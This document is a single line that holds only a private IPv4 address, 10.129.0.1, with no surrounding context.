10.129.0.1